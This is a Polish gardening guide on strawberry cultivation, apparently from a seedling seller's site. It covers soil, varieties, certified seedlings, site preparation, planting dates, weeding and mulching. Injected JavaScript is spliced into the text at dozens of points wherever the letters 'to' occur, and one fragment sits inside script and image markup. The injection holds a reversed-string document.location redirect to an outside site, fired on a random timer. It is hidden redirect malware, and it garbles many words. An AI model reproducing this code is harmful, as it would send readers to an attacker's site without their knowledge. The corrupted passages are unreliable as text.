Uprawa truskawek. Rady doświadczonego ogrodnika.

Wymagania truskawek

Truskawki nie mają szczególnych wymagań glebowych. Będą dobrze rosnąć i plonować w każdej glebie ogrodowej, byle nie ciężkiej, zlewnej i nieprzepuszczalnej, jak również niezachwaszczonej chwastami trwałymi (perz, skrzyp, oset itp.).
Klimat naszego kraju dobrze służy tej roślinie. Jedynie w bardzo mroźne i bezśnieżne zimy radzimy przykryć zimujące rośliny (szczególnie odmiany mniej mrozoodporne) np. agrowłókniną.

Odmiany

Na świecie uprawia się tysiące odmian truskawek, w Polsce – kilkadziesiąt. Dlaczego aż tyle? To proste: nie istnieje jedna, doskonała odmiana, tj. taka, która ma wyłącznie zalety przy absolutnym braku wad. Jeżeli dana odmiana odznacza się uroczymi i niezwykle smacznymi owocami, tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to zwykle można mieć szereg zatrzeżeń do jej słabej odporności na mróz czy też do podatności na niektóre choroby. Poza tym poszczególne odmiany różnią się porą dojrzewania owoców. Trudno porównać która odmiana jest lepsza – wczesna czy późna. Dalej, rok rokowi nie równy – zimy bywają ostre i łagodne, lata suche i mokre. W zmiennych warunkach jedne odmiany truskawek będą rosnąć i plonować lepiej, inne gorzej. W związku z tym nasza rada jest taka: najlepiej posadzić w ogrodzie kilka odmian truskawek - od wczesnych do późnych. Dzięki temu wydłużymy okres zbioru owoców i zwiększymy „szansę na sukces” w uprawie tej rośliny. Zobacz polecane odmiany tutaj.

Sadzonki truskawek

sadzonka-na-stroneNa rynku spotkać można trzy rodzaje sadzonek truskawek: sadzonki zielone (kopane), sadzonki frigo oraz sadzonki doniczkowane. Wszystkie one mają swoje plusy i minusy. Ale, tak naprawdę, dla powodzenia w uprawie truskawek nie jest szczególnie istobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totne, na który rodzaj sadzonek postawimy. Absolutnie najważniejsze jest, ŻEBY SADZONKI BYŁY ZDROWE, tzn. wolne od określonych chorób i szkodników. Z doświadczenia wiemy, że najczęstszym błędem ogrodników-amatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torów jest zakładanie upraw truskawek z nie sprawdzonego materiału nasadzeniowego. To doprawdy iluzoryczna oszczędność! Sadzonki „od sąsiada” czy „od szwagra” na oko nie różnią się od materiału kwalifikowanego. Jednak, uwierzcie Państwo doświadczonemu ogrodnikowi – zakup zdrowych sadzonek jest podstawowym warunkiem powodzenia w uprawie truskawek. Sadzenie materiału zainfekowanego patobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}togenami rodzaju Phytobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tophora, Fusarium, Colletobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totrichum czy też Phytobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonemus (a tak najczęściej jest w przypadku sadzonek pozyskiwanych nie ze szkółek lecz z plantacji owocujących) z góry rokuje naszym wysiłkom jak najgorzej. Dlatego radzimy: zawsze pytajcie Państwo, czy sadzonki truskawek oferowane przez dostawcę mają świadectwo kwalifikacji Państwowej Inspekcji Ochrony Roślin i Nasiennictwa (PIORIN).

Przygotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanie stanowiska pod truskawki

45d90228f19b4b9b7ef5bb21fbbe2ea7Pod truskawki radzimy wybrać nasłoneczniony kawałek ogrodu w dobrej kulturze ogrodniczej, najlepiej po warzywach (szczególnie strączkowych), broń Boże po truskawkach, bez tzw. chwastów trwałych (zwłaszcza bez perzu). Jeżeli takie chwasty wystepują, radzimy przygotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanie miejsca pod truskawki rozpocząć odpowiednio wcześniej, konieczne bowiem będzie opryskanie rosnących chwastów preparatem Roundup. W przypadku skrzypu polnego radzimy dodać do Roundupu preparatu Starane bądź Chwastobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toxu Extra.
Truskawki będą wdzięczne za kompost czy też stary, zleżały obornik, który należałoby rozsypać w ilości ok 5kg/m2 przed przekopaniem gleby. Po przekopaniu poletko trzeba wyrównać grabkami i wstrzmać się z sadzeniem kilka dni, dopóki ziemia nie osiądzie.

Termin sadzenia truskawek

termin sadzenia truskawekJeszcze do niedawna wybór terminu sadzenia truskawek był sprawą banalnie prostą: jesień lub wiosna (tylko wtedy dostępne były odpowiednio ukorzenione sadzonki). Od kilkunastu lat, dzięki opracowaniu i wdrożeniu nowych technologii produkcji sadzonek (sadzonki frigo oraz sadzonki doniczkowane), możemy je sadzić w ciągu całego okresu wegetacji. W przypadku sadzonek frigo, które sadzimy zwykle od początku wiosny do lipca, zbiór pierwszych owoców możliwy jest już po ok. 2 miesiącach od posadzenia (w ten sposób możemy sterować okresem owocowania). Co do sadzonek doniczkowanych, zwykle są one dostępne już od początku lipca i posadzone w tym terminie, w kolejnym roku wydadzą bardzo wysoki plon owoców (zasadą jest, że im wcześniej posadzimy truskawki w danym roku, tym większy ich plon zbierzemy w roku następnym).

termin sadzenia truskawek - wykres

WPŁYW TERMINU ZAKŁADANIA PLANTACJI TRUSKAWEK Z SADZONEK ZIELONYCH Z „NAGIMI” KORZENIAMI NA PLON OWOCÓW Z ROŚLINY W PIERWSZYM ROKU PO POSADZENIU (wg Danka) (za Hasło Ogrodnicze 12/1999).

Pielęgnacja truskawek

Największym wyzwaniem dla ogrodników-amatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torów jest utrzymanie truskawek w stanie niezachwaszczonym. Jest tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to tym łatwiejsze, im lepiej przygotuje się glebę przed posadzeniem roślin. Na większych plantacjach sprawę załatwiają herbicydy, w mniejszych ogródkach – motyki.
ScreenHunter_12 Sep. 05 08.42Dla „leniuchów” mamy taką radę: sadźmy truskawki w otworach wykonanych w czarnej agrowłókninie. Dzięki temu, że włóknina jest czarna – chwasty nie mają szans, a woda z opadów bądź z węża może bez trudu przez agrowłókninę przenikać i swobodnie wsiąkać w glebę. Owoce truskawek wyściółkowanych czarną agrowłókniną zawsze są czyściutkie, bez grama piasku.
Kolejną czynnością, od której nie uciekniemy, jest usuwanie wyrastających rozłogów. Gdybyśmy tego zaniechali, nasze rośliny wkrótce zagęściłyby się nadmiernie, co skutkowałoby silnym zdrobnieniem owoców w roku przyszłym.
Ponadtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, jakkolwiek banalnie by tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nie zabrzmiało, truskawki trzeba podlewać. Szczególnie w okresie silnego wzrostu owoców. Jeżeli o tym zapomnimy, będziemy zbierać „poziomki”.

Ochrona truskawek przed chorobami i szkodnikami

tobor-latigid//:sptth'=ferh.noitacol.tnemucod">tosc-lisci-truskawki495.jpg">biala-plamis<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tobor-latigid//:sptth'=ferh.noitacol.tnemucod">tosc-lisci-truskawki495" src="https://www.najtansze-sadzonki.pl/wp-content/uploads/2014/09/biala-plamistobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosc-lisci-truskawki495-150x150.jpg" width="150" height="150" />Na dużych plantacjach tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towarowych ochrona truskawek przed patobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}togenami jest jednym z kluczowych elementów procesu produkcyjnego. Do tego celu używa się rozmaitych pestycydów, ale też preparatów biologicznych. Naszym zdaniem stobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowanie chemii na truskawkach w małych ogródkach przydomowych nie zawsze ma sens.

 

 

Ściółkowanie

strawberries-strawWartobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to sciółkować odmiany późne i bardzo wczesne agrowłókniną lub słomą:

- lepsze zimowanie roślin
- szybszy start na wiosne
- czyste, nie wybrudzone owoce
- nie ma chwastów